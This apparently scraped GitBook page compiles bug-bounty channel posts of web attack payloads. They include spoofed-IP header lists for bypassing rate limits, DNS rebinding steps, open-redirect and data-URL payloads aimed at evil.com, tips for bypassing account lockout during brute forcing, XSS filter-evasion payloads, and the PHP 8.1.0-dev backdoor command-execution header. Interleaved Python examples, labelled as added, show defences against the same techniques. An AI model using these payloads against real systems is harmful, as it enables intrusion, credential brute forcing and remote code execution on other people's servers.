Bug Bounty - GitBook
Everything 4 bug bounty https://t.me/GiftWay32robot?start=_tgr_HwZ24DI5MWJk
Rate Limit Bypass using HTTP Headers
CACHE_INFO: 127.0.0.1 CF_CONNECTING_IP: 127.0.0.1 CF-Connecting-IP: 127.0.0.1 CLIENT_IP: 127.0.0.1 Client-IP: 127.0.0.1 COMING_FROM: 127.0.0.1 CONNECT_VIA_IP: 127.0.0.1 FORWARD_FOR: 127.0.0.1 FORWARD-FOR: 127.0.0.1 FORWARDED_FOR_IP: 127.0.0.1 FORWARDED_FOR: 127.0.0.1 FORWARDED-FOR-IP: 127.0.0.1 FORWARDED-FOR: 127.0.0.1 FORWARDED: 127.0.0.1 HTTP-CLIENT-IP: 127.0.0.1 HTTP-FORWARDED-FOR-IP: 127.0.0.1 HTTP-PC-REMOTE-ADDR: 127.0.0.1 HTTP-PROXY-CONNECTION: 127.0.0.1 HTTP-VIA: 127.0.0.1 HTTP-X-FORWARDED-FOR-IP: 127.0.0.1 HTTP-X-IMFORWARDS: 127.0.0.1 HTTP-XROXY-CONNECTION: 127.0.0.1 PC_REMOTE_ADDR: 127.0.0.1 PRAGMA: 127.0.0.1 PROXY_AUTHORIZATION: 127.0.0.1 PROXY_CONNECTION: 127.0.0.1 Proxy-Client-IP: 127.0.0.1 PROXY: 127.0.0.1 REMOTE_ADDR: 127.0.0.1 Source-IP: 127.0.0.1 True-Client-IP: 127.0.0.1 Via: 127.0.0.1 VIA: 127.0.0.1 WL-Proxy-Client-IP: 127.0.0.1 X_CLUSTER_CLIENT_IP: 127.0.0.1 X_COMING_FROM: 127.0.0.1 X_DELEGATE_REMOTE_HOST: 127.0.0.1 X_FORWARDED_FOR_IP: 127.0.0.1 X_FORWARDED_FOR: 127.0.0.1 X_FORWARDED: 127.0.0.1 X_IMFORWARDS: 127.0.0.1 X_LOCKING: 127.0.0.1 X_LOOKING: 127.0.0.1 X_REAL_IP: 127.0.0.1 X-Backend-Host: 127.0.0.1 X-BlueCoat-Via: 127.0.0.1 X-Cache-Info: 127.0.0.1 X-Forward-For: 127.0.0.1 X-Forwarded-By: 127.0.0.1 X-Forwarded-For-Original: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1 X-Forwarded-Server: 127.0.0.1 X-Forwarded-Host: 127.0.0.1 X-From-IP: 127.0.0.1 X-From: 127.0.0.1 X-Gateway-Host: 127.0.0.1 X-Host: 127.0.0.1 X-Ip: 127.0.0.1 X-Original-Host: 127.0.0.1 X-Original-IP: 127.0.0.1 X-Original-Remote-Addr: 127.0.0.1 X-Original-Url: 127.0.0.1 X-Originally-Forwarded-For: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-ProxyMesh-IP: 127.0.0.1 X-ProxyUser-IP: 127.0.0.1 X-Real-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-True-Client-IP: 127.0.0.1 XONNECTION: 127.0.0.1 XPROXY: 127.0.0.1 XROXY_CONNECTION: 127.0.0.1 Z-Forwarded-For: 127.0.0.1 ZCACHE_CONTROL: 127.0.0.1
https://t.me/rootdr_research #Web #Payloads #bugbounty
If the target does not cache the DNS query, then use DNS rebinding to bypass the security mechanism.
For example:
The server checks whether attacker.com points to localhost; if it does not, the server makes a request to attacker.com.
Use DNS rebinding to bypass it.
First set the IP to something valid, then, when the DNS request comes for attacker.com, quickly change it to localhost.
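From the defender's side, the rebinding post above describes a check-then-use race between two DNS lookups. The sketch below is an added example, not code from the channel: it models that race with a constructed resolver and shows the usual fix of resolving once and connecting to the validated address. The function names and the sample addresses are assumptions.

```python
import ipaddress

def is_public(ip):
    """True only for globally routable addresses (rejects loopback, RFC 1918, link-local)."""
    addr = ipaddress.ip_address(ip)
    mapped = getattr(addr, "ipv4_mapped", None)  # unwrap ::ffff:a.b.c.d
    return (mapped if mapped is not None else addr).is_global

def rebinding_resolver(answers):
    """Constructed stand-in for a zero-TTL DNS zone: each lookup gets the next answer set."""
    queue = iter(answers)
    return lambda host: next(queue)

def check_then_fetch(host, resolve):
    """Flawed pattern: the validation and the connection each resolve the name."""
    if not all(is_public(ip) for ip in resolve(host)):
        raise PermissionError(f"{host} resolves to a non-public address")
    return resolve(host)[0]  # second lookup: the address the HTTP client connects to

def resolve_once_and_pin(host, resolve):
    """Hardened pattern: one lookup, every answer validated, connection pinned to it."""
    ips = resolve(host)
    if not ips or not all(is_public(ip) for ip in ips):
        raise PermissionError(f"{host} resolves to a non-public address")
    return ips[0]  # connect to this literal IP; keep `host` only for Host header and SNI

def demo():
    # Constructed zone data: a public answer for the first lookup, loopback for the second
    zone = [["93.184.216.34"], ["127.0.0.1"]]
    flawed = check_then_fetch("attacker.com", rebinding_resolver(zone))
    pinned = resolve_once_and_pin("attacker.com", rebinding_resolver(zone))
    return flawed, pinned

if __name__ == "__main__":
    print(demo())
```

The same validation has to be repeated for every redirect hop the HTTP client follows, since each hop is a new name to resolve.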
🚀 A look at up-to-date bypasses for Open Redirect
Here I want to share a few new and creative bypasses for the Open Redirect bug that you can use to bypass filters easily!
🔥 First of all, the Subdomain Overloading technique
If the site insists that only its own domain is valid, you can use a fake subdomain:
site.com/login?url=https://site.com.evil.com
Here the original domain comes first, but the malicious domain is hidden inside it, and you can redirect easily.
🔥 Playing with TLDs and encoding
Here is another great method for bypassing:
site.com/login?url=https://evil.com/%2E%2E%2E%2F
Or with a hash sign:
site.com/login?url=https://evil.com#site.com
This way the server thinks the original domain is valid.
🔥 Unicode!
site.com/login?url=https://evil.com%5Csite.com
Or:
site.com/login?url=https://evil.com%EF%BC%8Fsite.com
🔥 Open URL Wrapping
If you see the site objecting, use intermediary links. For example, put Google in the middle:
site.com/login?url=https://google.com/url?q=https://evil.com
This works in a lot of places.
🔥 Data URL Injection
And now the final masterpiece! Using a Data URL you can shove malicious code straight down the site's throat:
site.com/login?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnU3VwZXIhJyk8L3NjcmlwdD4=
You can attack very professionally and demonstrate its impact.
💡 Summary
Test these bypasses:
Fake subdomain
Encoding such as %2E and %5C
Intermediary links such as Google
Data URL for injecting data
Don't forget: if you find a new technique, comment here so others can learn too!
🧑💻 The world of bug bounty means creativity!
https://t.me/rootdr_research
#web
#bugbountt
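Every bypass in the Open Redirect post above works against validators that match the allowed domain as a substring, prefix or suffix of the raw string. The following is an added example, not code from the channel: it runs the post's `url=` values, as a framework would deliver them after percent-decoding, through such a check and through an exact-host allowlist. `ALLOWED_HOSTS`, the function names and the shortened data: value are assumptions.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"site.com"}  # assumption: the only host this app may redirect to

def naive_is_safe(target):
    """Flawed check the listed bypasses rely on: substring match on the raw value."""
    return "site.com" in target

def is_safe_redirect(target):
    """Accept only https URLs whose parsed host is exactly on the allowlist."""
    # Reject characters a browser may normalise differently from our parser:
    # non-ASCII (e.g. U+FF0F fullwidth solidus), backslash, whitespace, controls.
    if not target.isascii() or "\\" in target:
        return False
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in target):
        return False
    try:
        parts = urlsplit(target)
    except ValueError:
        return False
    if parts.scheme != "https" or parts.username is not None:
        return False
    # Exact match: an allowlisted host that is itself an open redirector
    # (the "URL wrapping" case) would still forward users elsewhere.
    return parts.hostname in ALLOWED_HOSTS

# Constructed inputs: the post's url= values after percent-decoding
CASES = [
    "https://site.com/account",
    "https://site.com.evil.com",
    "https://evil.com/.../",
    "https://evil.com#site.com",
    "https://evil.com\\site.com",
    "https://evil.com\uff0fsite.com",
    "https://google.com/url?q=https://evil.com",
    "data:text/html;base64,AAAA",
]

def evaluate():
    """Map each case to (naive verdict, strict verdict)."""
    return {u: (naive_is_safe(u), is_safe_redirect(u)) for u in CASES}

if __name__ == "__main__":
    for url, verdicts in evaluate().items():
        print(verdicts, repr(url))
```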
You've been brute forcing an account, but suddenly the account is locked.
Try these methods to bypass the locking mechanism:
1. Try to spoof the IP address using X-headers, hop-by-hop headers, etc.
2. Use verb tampering to your advantage.
3. Try changing the request type.
4. Sometimes using CRLF or a null byte helps you out.
And so on.
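Both the rate-limit header list and the lockout post above depend on the server taking its throttling key from a client-supplied header. This added example (not code from the channel) derives the client address only from the socket peer or from a chain vouched for by trusted proxies, and counts failures per account as well as per address. `TRUSTED_PROXIES`, the class and function names, and the plain-dict header representation are assumptions.

```python
import ipaddress
from collections import Counter

TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]  # assumption: our own load balancers

def _parse(value):
    try:
        return ipaddress.ip_address(value.strip())
    except ValueError:
        return None

def _trusted(value):
    addr = _parse(value)
    return addr is not None and any(addr in net for net in TRUSTED_PROXIES)

def client_ip(peer_ip, headers):
    """Address to throttle on: the socket peer unless a trusted proxy vouches otherwise."""
    if not _trusted(peer_ip):
        return peer_ip  # direct connection: every header is client-controlled
    for hop in reversed(headers.get("X-Forwarded-For", "").split(",")):
        if _parse(hop) is None:
            break  # empty or malformed entry: stop trusting the chain
        if not _trusted(hop):
            return hop.strip()  # rightmost hop not added by our own proxies
    return peer_ip

class LoginThrottle:
    """Failure counters keyed on account and derived IP (time window omitted for brevity)."""

    def __init__(self, max_failures=5):
        self.max_failures = max_failures
        self.failures = Counter()

    def _keys(self, account, peer_ip, headers):
        return ("acct", account.casefold()), ("ip", client_ip(peer_ip, headers))

    def record_failure(self, account, peer_ip, headers):
        # Called from the authentication code itself, so the HTTP verb and the
        # request content type have no influence on what gets counted.
        self.failures.update(self._keys(account, peer_ip, headers))

    def is_blocked(self, account, peer_ip, headers):
        return any(self.failures[k] >= self.max_failures
                   for k in self._keys(account, peer_ip, headers))
```

Headers other than the one the proxy is configured to set (`X-Real-IP`, `Client-IP`, `True-Client-IP` and the rest of the list) are never read, and the edge proxy should strip or overwrite them on ingress.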
<22 foo="<img src=x onerror='alert(1)'">test</22>
This payload may help you to bypass a WAF or trick sanitizers.
List of 1400 write-ups and reports from the HackerOne site
A great list where you can access a bank of write-ups based on your needs.
A lot of time has definitely been spent on this file, I hope you get the most out of it.
Bypassing XSS WAF protection using invisible separators before or after the function name
<IMG/SRC/ONERROR = ALERT (1337)>
<svg/onload = alert (2)>
Explanation:
You can insert invisible separator characters (for example, Zero Width No-Break Space, Zero Width Space or a non-breaking space) before or after the function name (for example, alert). This helps to get around filters and WAFs (Web Application Firewalls), which do not expect such characters inside the function name and therefore do not block such attacks.
http://GitBook_s.t.me
Find a server running PHP 8.1.0-dev ❓
🚨 Check for easy RCE 🚨
👇 Payload:
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbountytips #bugbounty